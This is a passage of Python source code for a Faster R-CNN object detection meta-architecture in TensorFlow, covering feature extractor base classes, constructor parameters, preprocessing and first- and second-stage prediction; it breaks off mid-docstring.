anchors and proposal_boxes are both represented as absolute coordinates.
Images are resized in the `preprocess` method.
The Faster R-CNN meta architecture has two post-processing methods
`_postprocess_rpn` which is applied after first stage and
`_postprocess_box_classifier` which is applied after second stage. There are
three different ways post-processing can happen depending on number_of_stages
configured in the meta architecture:
1. When number_of_stages is 1:
`_postprocess_rpn` is run as part of the `postprocess` method where
true_image_shapes is used to clip proposals, perform non-max suppression and
normalize them.
2. When number of stages is 2:
`_postprocess_rpn` is run as part of the `_predict_second_stage` method where
`resized_image_shapes` is used to clip proposals, perform non-max suppression
and normalize them. In this case `postprocess` method skips `_postprocess_rpn`
and only runs `_postprocess_box_classifier` using `true_image_shapes` to clip
detections, perform non-max suppression and normalize them.
3. When number of stages is 3:
`_postprocess_rpn` is run as part of the `_predict_second_stage` using
`resized_image_shapes` to clip proposals, perform non-max suppression and
normalize them. Subsequently, `_postprocess_box_classifier` is run as part of
`_predict_third_stage` using `true_image_shapes` to clip detections, peform
non-max suppression and normalize them. In this case, the `postprocess` method
skips both `_postprocess_rpn` and `_postprocess_box_classifier`.
"""
import abc
import functools
import tensorflow as tf
from tensorflow.contrib import framework as contrib_framework
from tensorflow.contrib import slim as contrib_slim
from object_detection.anchor_generators import grid_anchor_generator
from object_detection.builders import box_predictor_builder
from object_detection.builders import hyperparams_builder
from object_detection.core import box_list
from object_detection.core import box_list_ops
from object_detection.core import box_predictor
from object_detection.core import losses
from object_detection.core import model
from object_detection.core import standard_fields as fields
from object_detection.core import target_assigner
from object_detection.utils import ops
from object_detection.utils import shape_utils
from object_detection.utils import variables_helper
slim = contrib_slim
_UNINITIALIZED_FEATURE_EXTRACTOR = '__uninitialized__'
class FasterRCNNFeatureExtractor(object):
"""Faster R-CNN Feature Extractor definition."""
def __init__(self,
is_training,
first_stage_features_stride,
batch_norm_trainable=False,
reuse_weights=None,
weight_decay=0.0):
"""Constructor.
Args:
is_training: A boolean indicating whether the training version of the
computation graph should be constructed.
first_stage_features_stride: Output stride of extracted RPN feature map.
batch_norm_trainable: Whether to update batch norm parameters during
training or not. When training with a relative large batch size
(e.g. 8), it could be desirable to enable batch norm update.
reuse_weights: Whether to reuse variables. Default is None.
weight_decay: float weight decay for feature extractor (default: 0.0).
"""
self._is_training = is_training
self._first_stage_features_stride = first_stage_features_stride
self._train_batch_norm = (batch_norm_trainable and is_training)
self._reuse_weights = reuse_weights
self._weight_decay = weight_decay
@abc.abstractmethod
def preprocess(self, resized_inputs):
"""Feature-extractor specific preprocessing (minus image resizing)."""
pass
def extract_proposal_features(self, preprocessed_inputs, scope):
"""Extracts first stage RPN features.
This function is responsible for extracting feature maps from preprocessed
images. These features are used by the region proposal network (RPN) to
predict proposals.
Args:
preprocessed_inputs: A [batch, height, width, channels] float tensor
representing a batch of images.
scope: A scope name.
Returns:
rpn_feature_map: A tensor with shape [batch, height, width, depth]
activations: A dictionary mapping activation tensor names to tensors.
"""
with tf.variable_scope(scope, values=[preprocessed_inputs]):
return self._extract_proposal_features(preprocessed_inputs, scope)
@abc.abstractmethod
def _extract_proposal_features(self, preprocessed_inputs, scope):
"""Extracts first stage RPN features, to be overridden."""
pass
def extract_box_classifier_features(self, proposal_feature_maps, scope):
"""Extracts second stage box classifier features.
Args:
proposal_feature_maps: A 4-D float tensor with shape
[batch_size * self.max_num_proposals, crop_height, crop_width, depth]
representing the feature map cropped to each proposal.
scope: A scope name.
Returns:
proposal_classifier_features: A 4-D float tensor with shape
[batch_size * self.max_num_proposals, height, width, depth]
representing box classifier features for each proposal.
"""
with tf.variable_scope(
scope, values=[proposal_feature_maps], reuse=tf.AUTO_REUSE):
return self._extract_box_classifier_features(proposal_feature_maps, scope)
@abc.abstractmethod
def _extract_box_classifier_features(self, proposal_feature_maps, scope):
"""Extracts second stage box classifier features, to be overridden."""
pass
def restore_from_classification_checkpoint_fn(
self,
first_stage_feature_extractor_scope,
second_stage_feature_extractor_scope):
"""Returns a map of variables to load from a foreign checkpoint.
Args:
first_stage_feature_extractor_scope: A scope name for the first stage
feature extractor.
second_stage_feature_extractor_scope: A scope name for the second stage
feature extractor.
Returns:
A dict mapping variable names (to load from a checkpoint) to variables in
the model graph.
"""
variables_to_restore = {}
for variable in variables_helper.get_global_variables_safely():
for scope_name in [first_stage_feature_extractor_scope,
second_stage_feature_extractor_scope]:
if variable.op.name.startswith(scope_name):
var_name = variable.op.name.replace(scope_name + '/', '')
variables_to_restore[var_name] = variable
return variables_to_restore
class FasterRCNNKerasFeatureExtractor(object):
"""Keras-based Faster R-CNN Feature Extractor definition."""
def __init__(self,
is_training,
first_stage_features_stride,
batch_norm_trainable=False,
weight_decay=0.0):
"""Constructor.
Args:
is_training: A boolean indicating whether the training version of the
computation graph should be constructed.
first_stage_features_stride: Output stride of extracted RPN feature map.
batch_norm_trainable: Whether to update batch norm parameters during
training or not. When training with a relative large batch size
(e.g. 8), it could be desirable to enable batch norm update.
weight_decay: float weight decay for feature extractor (default: 0.0).
"""
self._is_training = is_training
self._first_stage_features_stride = first_stage_features_stride
self._train_batch_norm = (batch_norm_trainable and is_training)
self._weight_decay = weight_decay
@abc.abstractmethod
def preprocess(self, resized_inputs):
"""Feature-extractor specific preprocessing (minus image resizing)."""
pass
@abc.abstractmethod
def get_proposal_feature_extractor_model(self, name):
"""Get model that extracts first stage RPN features, to be overridden."""
pass
@abc.abstractmethod
def get_box_classifier_feature_extractor_model(self, name):
"""Get model that extracts second stage box classifier features."""
pass
def restore_from_classification_checkpoint_fn(
self,
first_stage_feature_extractor_scope,
second_stage_feature_extractor_scope):
"""Returns a map of variables to load from a foreign checkpoint.
Args:
first_stage_feature_extractor_scope: A scope name for the first stage
feature extractor.
second_stage_feature_extractor_scope: A scope name for the second stage
feature extractor.
Returns:
A dict mapping variable names (to load from a checkpoint) to variables in
the model graph.
"""
variables_to_restore = {}
for variable in variables_helper.get_global_variables_safely():
for scope_name in [first_stage_feature_extractor_scope,
second_stage_feature_extractor_scope]:
if variable.op.name.startswith(scope_name):
var_name = variable.op.name.replace(scope_name + '/', '')
variables_to_restore[var_name] = variable
return variables_to_restore
class FasterRCNNMetaArch(model.DetectionModel):
"""Faster R-CNN Meta-architecture definition."""
def __init__(self,
is_training,
num_classes,
image_resizer_fn,
feature_extractor,
number_of_stages,
first_stage_anchor_generator,
first_stage_target_assigner,
first_stage_atrous_rate,
first_stage_box_predictor_arg_scope_fn,
first_stage_box_predictor_kernel_size,
first_stage_box_predictor_depth,
first_stage_minibatch_size,
first_stage_sampler,
first_stage_non_max_suppression_fn,
first_stage_max_proposals,
first_stage_localization_loss_weight,
first_stage_objectness_loss_weight,
crop_and_resize_fn,
initial_crop_size,
maxpool_kernel_size,
maxpool_stride,
second_stage_target_assigner,
second_stage_mask_rcnn_box_predictor,
second_stage_batch_size,
second_stage_sampler,
second_stage_non_max_suppression_fn,
second_stage_score_conversion_fn,
second_stage_localization_loss_weight,
second_stage_classification_loss_weight,
second_stage_classification_loss,
second_stage_mask_prediction_loss_weight=1.0,
hard_example_miner=None,
parallel_iterations=16,
add_summaries=True,
clip_anchors_to_image=False,
use_static_shapes=False,
resize_masks=True,
freeze_batchnorm=False,
return_raw_detections_during_predict=False):
"""FasterRCNNMetaArch Constructor.
Args:
is_training: A boolean indicating whether the training version of the
computation graph should be constructed.
num_classes: Number of classes. Note that num_classes *does not*
include the background category, so if groundtruth labels take values
in {0, 1, .., K-1}, num_classes=K (and not K+1, even though the
assigned classification targets can range from {0,... K}).
image_resizer_fn: A callable for image resizing. This callable
takes a rank-3 image tensor of shape [height, width, channels]
(corresponding to a single image), an optional rank-3 instance mask
tensor of shape [num_masks, height, width] and returns a resized rank-3
image tensor, a resized mask tensor if one was provided in the input. In
addition this callable must also return a 1-D tensor of the form
[height, width, channels] containing the size of the true image, as the
image resizer can perform zero padding. See protos/image_resizer.proto.
feature_extractor: A FasterRCNNFeatureExtractor object.
number_of_stages: An integer values taking values in {1, 2, 3}. If
1, the function will construct only the Region Proposal Network (RPN)
part of the model. If 2, the function will perform box refinement and
other auxiliary predictions all in the second stage. If 3, it will
extract features from refined boxes and perform the auxiliary
predictions on the non-maximum suppressed refined boxes.
If is_training is true and the value of number_of_stages is 3, it is
reduced to 2 since all the model heads are trained in parallel in second
stage during training.
first_stage_anchor_generator: An anchor_generator.AnchorGenerator object
(note that currently we only support
grid_anchor_generator.GridAnchorGenerator objects)
first_stage_target_assigner: Target assigner to use for first stage of
Faster R-CNN (RPN).
first_stage_atrous_rate: A single integer indicating the atrous rate for
the single convolution op which is applied to the `rpn_features_to_crop`
tensor to obtain a tensor to be used for box prediction. Some feature
extractors optionally allow for producing feature maps computed at
denser resolutions. The atrous rate is used to compensate for the
denser feature maps by using an effectively larger receptive field.
(This should typically be set to 1).
first_stage_box_predictor_arg_scope_fn: Either a
Keras layer hyperparams object or a function to construct tf-slim
arg_scope for conv2d, separable_conv2d and fully_connected ops. Used
for the RPN box predictor. If it is a keras hyperparams object the
RPN box predictor will be a Keras model. If it is a function to
construct an arg scope it will be a tf-slim box predictor.
first_stage_box_predictor_kernel_size: Kernel size to use for the
convolution op just prior to RPN box predictions.
first_stage_box_predictor_depth: Output depth for the convolution op
just prior to RPN box predictions.
first_stage_minibatch_size: The "batch size" to use for computing the
objectness and location loss of the region proposal network. This
"batch size" refers to the number of anchors selected as contributing
to the loss function for any given image within the image batch and is
only called "batch_size" due to terminology from the Faster R-CNN paper.
first_stage_sampler: Sampler to use for first stage loss (RPN loss).
first_stage_non_max_suppression_fn: batch_multiclass_non_max_suppression
callable that takes `boxes`, `scores` and optional `clip_window`(with
all other inputs already set) and returns a dictionary containing
tensors with keys: `detection_boxes`, `detection_scores`,
`detection_classes`, `num_detections`. This is used to perform non max
suppression on the boxes predicted by the Region Proposal Network
(RPN).
See `post_processing.batch_multiclass_non_max_suppression` for the type
and shape of these tensors.
first_stage_max_proposals: Maximum number of boxes to retain after
performing Non-Max Suppression (NMS) on the boxes predicted by the
Region Proposal Network (RPN).
first_stage_localization_loss_weight: A float
first_stage_objectness_loss_weight: A float
crop_and_resize_fn: A differentiable resampler to use for cropping RPN
proposal features.
initial_crop_size: A single integer indicating the output size
(width and height are set to be the same) of the initial bilinear
interpolation based cropping during ROI pooling.
maxpool_kernel_size: A single integer indicating the kernel size of the
max pool op on the cropped feature map during ROI pooling.
maxpool_stride: A single integer indicating the stride of the max pool
op on the cropped feature map during ROI pooling.
second_stage_target_assigner: Target assigner to use for second stage of
Faster R-CNN. If the model is configured with multiple prediction heads,
this target assigner is used to generate targets for all heads (with the
correct `unmatched_class_label`).
second_stage_mask_rcnn_box_predictor: Mask R-CNN box predictor to use for
the second stage.
second_stage_batch_size: The batch size used for computing the
classification and refined location loss of the box classifier. This
"batch size" refers to the number of proposals selected as contributing
to the loss function for any given image within the image batch and is
only called "batch_size" due to terminology from the Faster R-CNN paper.
second_stage_sampler: Sampler to use for second stage loss (box
classifier loss).
second_stage_non_max_suppression_fn: batch_multiclass_non_max_suppression
callable that takes `boxes`, `scores`, optional `clip_window` and
optional (kwarg) `mask` inputs (with all other inputs already set)
and returns a dictionary containing tensors with keys:
`detection_boxes`, `detection_scores`, `detection_classes`,
`num_detections`, and (optionally) `detection_masks`. See
`post_processing.batch_multiclass_non_max_suppression` for the type and
shape of these tensors.
second_stage_score_conversion_fn: Callable elementwise nonlinearity
(that takes tensors as inputs and returns tensors). This is usually
used to convert logits to probabilities.
second_stage_localization_loss_weight: A float indicating the scale factor
for second stage localization loss.
second_stage_classification_loss_weight: A float indicating the scale
factor for second stage classification loss.
second_stage_classification_loss: Classification loss used by the second
stage classifier. Either losses.WeightedSigmoidClassificationLoss or
losses.WeightedSoftmaxClassificationLoss.
second_stage_mask_prediction_loss_weight: A float indicating the scale
factor for second stage mask prediction loss. This is applicable only if
second stage box predictor is configured to predict masks.
hard_example_miner: A losses.HardExampleMiner object (can be None).
parallel_iterations: (Optional) The number of iterations allowed to run
in parallel for calls to tf.map_fn.
add_summaries: boolean (default: True) controlling whether summary ops
should be added to tensorflow graph.
clip_anchors_to_image: Normally, anchors generated for a given image size
are pruned during training if they lie outside the image window. This
option clips the anchors to be within the image instead of pruning.
use_static_shapes: If True, uses implementation of ops with static shape
guarantees.
resize_masks: Indicates whether the masks presend in the groundtruth
should be resized in the model with `image_resizer_fn`
freeze_batchnorm: Whether to freeze batch norm parameters in the first
stage box predictor during training or not. When training with a small
batch size (e.g. 1), it is desirable to freeze batch norm update and
use pretrained batch norm params.
return_raw_detections_during_predict: Whether to return raw detection
boxes in the predict() method. These are decoded boxes that have not
been through postprocessing (i.e. NMS). Default False.
Raises:
ValueError: If `second_stage_batch_size` > `first_stage_max_proposals` at
training time.
ValueError: If first_stage_anchor_generator is not of type
grid_anchor_generator.GridAnchorGenerator.
"""
# TODO(rathodv): add_summaries is currently unused. Respect that directive
# in the future.
super(FasterRCNNMetaArch, self).__init__(num_classes=num_classes)
if not isinstance(first_stage_anchor_generator,
grid_anchor_generator.GridAnchorGenerator):
raise ValueError('first_stage_anchor_generator must be of type '
'grid_anchor_generator.GridAnchorGenerator.')
self._is_training = is_training
self._image_resizer_fn = image_resizer_fn
self._resize_masks = resize_masks
self._feature_extractor = feature_extractor
if isinstance(feature_extractor, FasterRCNNKerasFeatureExtractor):
# We delay building the feature extractor until it is used,
# to avoid creating the variables when a model is built just for data
# preprocessing. (This prevents a subtle bug where variable names are
# mismatched across workers, causing only one worker to be able to train)
self._feature_extractor_for_proposal_features = (
_UNINITIALIZED_FEATURE_EXTRACTOR)
self._feature_extractor_for_box_classifier_features = (
_UNINITIALIZED_FEATURE_EXTRACTOR)
else:
self._feature_extractor_for_proposal_features = None
self._feature_extractor_for_box_classifier_features = None
self._number_of_stages = number_of_stages
self._proposal_target_assigner = first_stage_target_assigner
self._detector_target_assigner = second_stage_target_assigner
# Both proposal and detector target assigners use the same box coder
self._box_coder = self._proposal_target_assigner.box_coder
# (First stage) Region proposal network parameters
self._first_stage_anchor_generator = first_stage_anchor_generator
self._first_stage_atrous_rate = first_stage_atrous_rate
self._first_stage_box_predictor_depth = first_stage_box_predictor_depth
self._first_stage_box_predictor_kernel_size = (
first_stage_box_predictor_kernel_size)
self._first_stage_minibatch_size = first_stage_minibatch_size
self._first_stage_sampler = first_stage_sampler
if isinstance(first_stage_box_predictor_arg_scope_fn,
hyperparams_builder.KerasLayerHyperparams):
num_anchors_per_location = (
self._first_stage_anchor_generator.num_anchors_per_location())
if len(num_anchors_per_location) != 1:
raise ValueError('anchor_generator is expected to generate anchors '
'corresponding to a single feature map.')
conv_hyperparams = (
first_stage_box_predictor_arg_scope_fn)
self._first_stage_box_predictor_first_conv = (
tf.keras.Sequential([
tf.keras.layers.Conv2D(
self._first_stage_box_predictor_depth,
kernel_size=[self._first_stage_box_predictor_kernel_size,
self._first_stage_box_predictor_kernel_size],
dilation_rate=self._first_stage_atrous_rate,
padding='SAME',
name='RPNConv',
**conv_hyperparams.params()),
conv_hyperparams.build_batch_norm(
(self._is_training and not freeze_batchnorm),
name='RPNBatchNorm'),
tf.keras.layers.Lambda(
tf.nn.relu6,
name='RPNActivation')
], name='FirstStageRPNFeatures'))
self._first_stage_box_predictor = (
box_predictor_builder.build_convolutional_keras_box_predictor(
is_training=self._is_training,
num_classes=1,
conv_hyperparams=conv_hyperparams,
freeze_batchnorm=freeze_batchnorm,
inplace_batchnorm_update=False,
num_predictions_per_location_list=num_anchors_per_location,
use_dropout=False,
dropout_keep_prob=1.0,
box_code_size=self._box_coder.code_size,
kernel_size=1,
num_layers_before_predictor=0,
min_depth=0,
max_depth=0,
name=self.first_stage_box_predictor_scope))
else:
self._first_stage_box_predictor_arg_scope_fn = (
first_stage_box_predictor_arg_scope_fn)
def rpn_box_predictor_feature_extractor(rpn_features_to_crop):
with slim.arg_scope(self._first_stage_box_predictor_arg_scope_fn()):
reuse = tf.get_variable_scope().reuse
return slim.conv2d(
rpn_features_to_crop,
self._first_stage_box_predictor_depth,
kernel_size=[self._first_stage_box_predictor_kernel_size,
self._first_stage_box_predictor_kernel_size],
rate=self._first_stage_atrous_rate,
activation_fn=tf.nn.relu6,
scope='Conv',
reuse=reuse)
self._first_stage_box_predictor_first_conv = (
rpn_box_predictor_feature_extractor)
self._first_stage_box_predictor = (
box_predictor_builder.build_convolutional_box_predictor(
is_training=self._is_training,
num_classes=1,
conv_hyperparams_fn=self._first_stage_box_predictor_arg_scope_fn,
use_dropout=False,
dropout_keep_prob=1.0,
box_code_size=self._box_coder.code_size,
kernel_size=1,
num_layers_before_predictor=0,
min_depth=0,
max_depth=0))
self._first_stage_nms_fn = first_stage_non_max_suppression_fn
self._first_stage_max_proposals = first_stage_max_proposals
self._use_static_shapes = use_static_shapes
self._first_stage_localization_loss = (
losses.WeightedSmoothL1LocalizationLoss())
self._first_stage_objectness_loss = (
losses.WeightedSoftmaxClassificationLoss())
self._first_stage_loc_loss_weight = first_stage_localization_loss_weight
self._first_stage_obj_loss_weight = first_stage_objectness_loss_weight
# Per-region cropping parameters
self._crop_and_resize_fn = crop_and_resize_fn
self._initial_crop_size = initial_crop_size
self._maxpool_kernel_size = maxpool_kernel_size
self._maxpool_stride = maxpool_stride
# If max pooling is to be used, build the layer
if maxpool_kernel_size:
self._maxpool_layer = tf.keras.layers.MaxPooling2D(
[self._maxpool_kernel_size, self._maxpool_kernel_size],
strides=self._maxpool_stride,
name='MaxPool2D')
self._mask_rcnn_box_predictor = second_stage_mask_rcnn_box_predictor
self._second_stage_batch_size = second_stage_batch_size
self._second_stage_sampler = second_stage_sampler
self._second_stage_nms_fn = second_stage_non_max_suppression_fn
self._second_stage_score_conversion_fn = second_stage_score_conversion_fn
self._second_stage_localization_loss = (
losses.WeightedSmoothL1LocalizationLoss())
self._second_stage_classification_loss = second_stage_classification_loss
self._second_stage_mask_loss = (
losses.WeightedSigmoidClassificationLoss())
self._second_stage_loc_loss_weight = second_stage_localization_loss_weight
self._second_stage_cls_loss_weight = second_stage_classification_loss_weight
self._second_stage_mask_loss_weight = (
second_stage_mask_prediction_loss_weight)
self._hard_example_miner = hard_example_miner
self._parallel_iterations = parallel_iterations
self.clip_anchors_to_image = clip_anchors_to_image
if self._number_of_stages <= 0 or self._number_of_stages > 3:
raise ValueError('Number of stages should be a value in {1, 2, 3}.')
self._batched_prediction_tensor_names = []
self._return_raw_detections_during_predict = (
return_raw_detections_during_predict)
@property
def first_stage_feature_extractor_scope(self):
return 'FirstStageFeatureExtractor'
@property
def second_stage_feature_extractor_scope(self):
return 'SecondStageFeatureExtractor'
@property
def first_stage_box_predictor_scope(self):
return 'FirstStageBoxPredictor'
@property
def second_stage_box_predictor_scope(self):
return 'SecondStageBoxPredictor'
@property
def max_num_proposals(self):
"""Max number of proposals (to pad to) for each image in the input batch.
At training time, this is set to be the `second_stage_batch_size` if hard
example miner is not configured, else it is set to
`first_stage_max_proposals`. At inference time, this is always set to
`first_stage_max_proposals`.
Returns:
A positive integer.
"""
if self._is_training and not self._hard_example_miner:
return self._second_stage_batch_size
return self._first_stage_max_proposals
@property
def anchors(self):
if not self._anchors:
raise RuntimeError('anchors have not been constructed yet!')
if not isinstance(self._anchors, box_list.BoxList):
raise RuntimeError('anchors should be a BoxList object, but is not.')
return self._anchors
@property
def batched_prediction_tensor_names(self):
if not self._batched_prediction_tensor_names:
raise RuntimeError('Must call predict() method to get batched prediction '
'tensor names.')
return self._batched_prediction_tensor_names
def preprocess(self, inputs):
"""Feature-extractor specific preprocessing.
See base class.
For Faster R-CNN, we perform image resizing in the base class --- each
class subclassing FasterRCNNMetaArch is responsible for any additional
preprocessing (e.g., scaling pixel values to be in [-1, 1]).
Args:
inputs: a [batch, height_in, width_in, channels] float tensor representing
a batch of images with values between 0 and 255.0.
Returns:
preprocessed_inputs: a [batch, height_out, width_out, channels] float
tensor representing a batch of images.
true_image_shapes: int32 tensor of shape [batch, 3] where each row is
of the form [height, width, channels] indicating the shapes
of true images in the resized images, as resized images can be padded
with zeros.
Raises:
ValueError: if inputs tensor does not have type tf.float32
"""
with tf.name_scope('Preprocessor'):
(resized_inputs,
true_image_shapes) = shape_utils.resize_images_and_return_shapes(
inputs, self._image_resizer_fn)
return (self._feature_extractor.preprocess(resized_inputs),
true_image_shapes)
def _compute_clip_window(self, image_shapes):
"""Computes clip window for non max suppression based on image shapes.
This function assumes that the clip window's left top corner is at (0, 0).
Args:
image_shapes: A 2-D int32 tensor of shape [batch_size, 3] containing
shapes of images in the batch. Each row represents [height, width,
channels] of an image.
Returns:
A 2-D float32 tensor of shape [batch_size, 4] containing the clip window
for each image in the form [ymin, xmin, ymax, xmax].
"""
clip_heights = image_shapes[:, 0]
clip_widths = image_shapes[:, 1]
clip_window = tf.cast(
tf.stack([
tf.zeros_like(clip_heights),
tf.zeros_like(clip_heights), clip_heights, clip_widths
],
axis=1),
dtype=tf.float32)
return clip_window
def _proposal_postprocess(self, rpn_box_encodings,
rpn_objectness_predictions_with_background, anchors,
image_shape, true_image_shapes):
"""Wraps over FasterRCNNMetaArch._postprocess_rpn()."""
image_shape_2d = self._image_batch_shape_2d(image_shape)
proposal_boxes_normalized, _, _, num_proposals, _, _ = \
self._postprocess_rpn(
rpn_box_encodings, rpn_objectness_predictions_with_background,
anchors, image_shape_2d, true_image_shapes)
return proposal_boxes_normalized, num_proposals
def predict(self, preprocessed_inputs, true_image_shapes):
"""Predicts unpostprocessed tensors from input tensor.
This function takes an input batch of images and runs it through the
forward pass of the network to yield "raw" un-postprocessed predictions.
If `number_of_stages` is 1, this function only returns first stage
RPN predictions (un-postprocessed). Otherwise it returns both
first stage RPN predictions as well as second stage box classifier
predictions.
Other remarks:
+ Anchor pruning vs. clipping: following the recommendation of the Faster
R-CNN paper, we prune anchors that venture outside the image window at
training time and clip anchors to the image window at inference time.
+ Proposal padding: as described at the top of the file, proposals are
padded to self._max_num_proposals and flattened so that proposals from all
images within the input batch are arranged along the same batch dimension.
Args:
preprocessed_inputs: a [batch, height, width, channels] float tensor
representing a batch of images.
true_image_shapes: int32 tensor of shape [batch, 3] where each row is
of the form [height, width, channels] indicating the shapes
of true images in the resized images, as resized images can be padded
with zeros.
Returns:
prediction_dict: a dictionary holding "raw" prediction tensors:
1) rpn_box_predictor_features: A 4-D float32 tensor with shape
[batch_size, height, width, depth] to be used for predicting proposal
boxes and corresponding objectness scores.
2) rpn_features_to_crop: A 4-D float32 tensor with shape
[batch_size, height, width, depth] representing image features to crop
using the proposal boxes predicted by the RPN.
3) image_shape: a 1-D tensor of shape [4] representing the input
image shape.
4) rpn_box_encodings: 3-D float tensor of shape
[batch_size, num_anchors, self._box_coder.code_size] containing
predicted boxes.
5) rpn_objectness_predictions_with_background: 3-D float tensor of shape
[batch_size, num_anchors, 2] containing class
predictions (logits) for each of the anchors. Note that this
tensor *includes* background class predictions (at class index 0).
6) anchors: A 2-D tensor of shape [num_anchors, 4] representing anchors
for the first stage RPN (in absolute coordinates). Note that
`num_anchors` can differ depending on whether the model is created in
training or inference mode.
7) feature_maps: A single element list containing a 4-D float32 tensor
with shape batch_size, height, width, depth] representing the RPN
features to crop.
(and if number_of_stages > 1):
8) refined_box_encodings: a 3-D tensor with shape
[total_num_proposals, num_classes, self._box_coder.code_size]
representing predicted (final) refined box encodings, where
total_num_proposals=batch_size*self._max_num_proposals. If using
a shared box across classes the shape will instead be
[total_num_proposals, 1, self._box_coder.code_size].
9) class_predictions_with_background: a 3-D tensor with shape
[total_num_proposals, num_classes + 1] containing class
predictions (logits) for each of the anchors, where
total_num_proposals=batch_size*self._max_num_proposals.
Note that this tensor *includes* background class predictions
(at class index 0).
10) num_proposals: An int32 tensor of shape [batch_size] representing
the number of proposals generated by the RPN. `num_proposals` allows
us to keep track of which entries are to be treated as zero paddings
and which are not since we always pad the number of proposals to be
`self.max_num_proposals` for each image.
11) proposal_boxes: A float32 tensor of shape
[batch_size, self.max_num_proposals, 4] representing
decoded proposal bounding boxes in absolute coordinates.
12) mask_predictions: (optional) a 4-D tensor with shape
[total_num_padded_proposals, num_classes, mask_height, mask_width]
containing instance mask predictions.
13) raw_detection_boxes: (optional) a
[batch_size, self.max_num_proposals, num_classes, 4] float32 tensor
with detections prior to NMS in normalized coordinates.
14) raw_detection_feature_map_indices: (optional) a
[batch_size, self.max_num_proposals, num_classes] int32 tensor with
indices indicating which feature map each raw detection box was
produced from. The indices correspond to the elements in the
'feature_maps' field.
Raises:
ValueError: If `predict` is called before `preprocess`.
"""
prediction_dict = self._predict_first_stage(preprocessed_inputs)
if self._number_of_stages >= 2:
prediction_dict.update(
self._predict_second_stage(
prediction_dict['rpn_box_encodings'],
prediction_dict['rpn_objectness_predictions_with_background'],
prediction_dict['rpn_features_to_crop'],
prediction_dict['anchors'],
prediction_dict['image_shape'],
true_image_shapes))
if self._number_of_stages == 3:
prediction_dict = self._predict_third_stage(prediction_dict,
true_image_shapes)
self._batched_prediction_tensor_names = [
x for x in prediction_dict if x not in ('image_shape', 'anchors')
]
return prediction_dict
def _predict_first_stage(self, preprocessed_inputs):
"""First stage of prediction.
Args:
preprocessed_inputs: a [batch, height, width, channels] float tensor
representing a batch of images.
Returns:
prediction_dict: a dictionary holding "raw" prediction tensors:
1) rpn_box_predictor_features: A 4-D float32/bfloat16 tensor with shape
[batch_size, height, width, depth] to be used for predicting proposal
boxes and corresponding objectness scores.
2) rpn_features_to_crop: A 4-D float32/bfloat16 tensor with shape
[batch_size, height, width, depth] representing image features to crop
using the proposal boxes predicted by the RPN.
3) image_shape: a 1-D tensor of shape [4] representing the input
image shape.
4) rpn_box_encodings: 3-D float32 tensor of shape
[batch_size, num_anchors, self._box_coder.code_size] containing
predicted boxes.
5) rpn_objectness_predictions_with_background: 3-D float32 tensor of
shape [batch_size, num_anchors, 2] containing class predictions
(logits) for each of the anchors. Note that this tensor *includes*
background class predictions (at class index 0).
6) anchors: A 2-D tensor of shape [num_anchors, 4] representing anchors
for the first stage RPN (in absolute coordinates). Note that
`num_anchors` can differ depending on whether the model is created in
training or inference mode.
7) feature_maps: A single element list containing a 4-D float32 tensor
with shape batch_size, height, width, depth] representing the RPN
features to crop.
"""
(rpn_box_predictor_features, rpn_features_to_crop, anchors_boxlist,
image_shape) = self._extract_rpn_feature_maps(preprocessed_inputs)
(rpn_box_encodings, rpn_objectness_predictions_with_background
) = self._predict_rpn_proposals(rpn_box_predictor_features)
# The Faster R-CNN paper recommends pruning anchors that venture outside
# the image window at training time and clipping at inference time.
clip_window = tf.cast(tf.stack([0, 0, image_shape[1], image_shape[2]]),
dtype=tf.float32)
if self._is_training:
if self.clip_anchors_to_image:
anchors_boxlist = box_list_ops.clip_to_window(
anchors_boxlist, clip_window, filter_nonoverlapping=False)
else:
(rpn_box_encodings, rpn_objectness_predictions_with_background,
anchors_boxlist) = self._remove_invalid_anchors_and_predictions(
rpn_box_encodings, rpn_objectness_predictions_with_background,
anchors_boxlist, clip_window)
else:
anchors_boxlist = box_list_ops.clip_to_window(
anchors_boxlist, clip_window,
filter_nonoverlapping=not self._use_static_shapes)
self._anchors = anchors_boxlist
prediction_dict = {
'rpn_box_predictor_features':
rpn_box_predictor_features,
'rpn_features_to_crop':
rpn_features_to_crop,
'image_shape':
image_shape,
'rpn_box_encodings':
tf.cast(rpn_box_encodings, dtype=tf.float32),
'rpn_objectness_predictions_with_background':
tf.cast(rpn_objectness_predictions_with_background,
dtype=tf.float32),
'anchors':
anchors_boxlist.data['boxes'],
fields.PredictionFields.feature_maps: [rpn_features_to_crop]
}
return prediction_dict
def _image_batch_shape_2d(self, image_batch_shape_1d):
"""Takes a 1-D image batch shape tensor and converts it to a 2-D tensor.
Example:
If 1-D image batch shape tensor is [2, 300, 300, 3]. The corresponding 2-D
image batch tensor would be [[300, 300, 3], [300, 300, 3]]
Args:
image_batch_shape_1d: 1-D tensor of the form [batch_size, height,
width, channels].
Returns:
image_batch_shape_2d: 2-D tensor of shape [batch_size, 3] were each row is
of the form [height, width, channels].
"""
return tf.tile(tf.expand_dims(image_batch_shape_1d[1:], 0),
[image_batch_shape_1d[0], 1])
def _predict_second_stage(self, rpn_box_encodings,
rpn_objectness_predictions_with_background,
rpn_features_to_crop,
anchors,
image_shape,
true_image_shapes):
"""Predicts the output tensors from second stage of Faster R-CNN.
Args:
rpn_box_encodings: 4-D float tensor of shape
[batch_size, num_valid_anchors, self._box_coder.code_size] containing
predicted boxes.
rpn_objectness_predictions_with_background: 2-D float tensor of shape
[batch_size, num_valid_anchors, 2] containing class
predictions (logits) for each of the anchors. Note that this
tensor *includes* background class predictions (at class index 0).
rpn_features_to_crop: A 4-D float32 or bfloat16 tensor with shape
[batch_size, height, width, depth] representing image features to crop
using the proposal boxes predicted by the RPN.
anchors: 2-D float tensor of shape
[num_anchors, self._box_coder.code_size].
image_shape: A 1D int32 tensors of size [4] containing the image shape.
true_image_shapes: int32 tensor of shape [batch, 3] where each row is
of the form [height, width, channels] indicating the shapes
of true images in the resized images, as resized images can be padded
with zeros.
Returns:
prediction_dict: a dictionary holding "raw" prediction tensors:
1) refined_box_encodings: a 3-D float32 tensor with shape
[total_num_proposals, num_classes, self._box_coder.code_size]
representing predicted (final) refined box encodings, where
total_num_proposals=batch_size*self._max_num_proposals. If using a
shared box across classes the shape will instead be
[total_num_proposals, 1, self._box_coder.code_size].
2) class_predictions_with_background: a 3-D float32 tensor with shape
[total_num_proposals, num_classes + 1] containing class
predictions (logits) for each of the anchors, where
total_num_proposals=batch_size*self._max_num_proposals.
Note that this tensor *includes* background class predictions
(at class index 0).
3) num_proposals: An int32 tensor of shape [batch_size] representing the
number of proposals generated by the RPN. `num_proposals` allows us
to keep track of which entries are to be treated as zero paddings and
which are not since we always pad the number of proposals to be
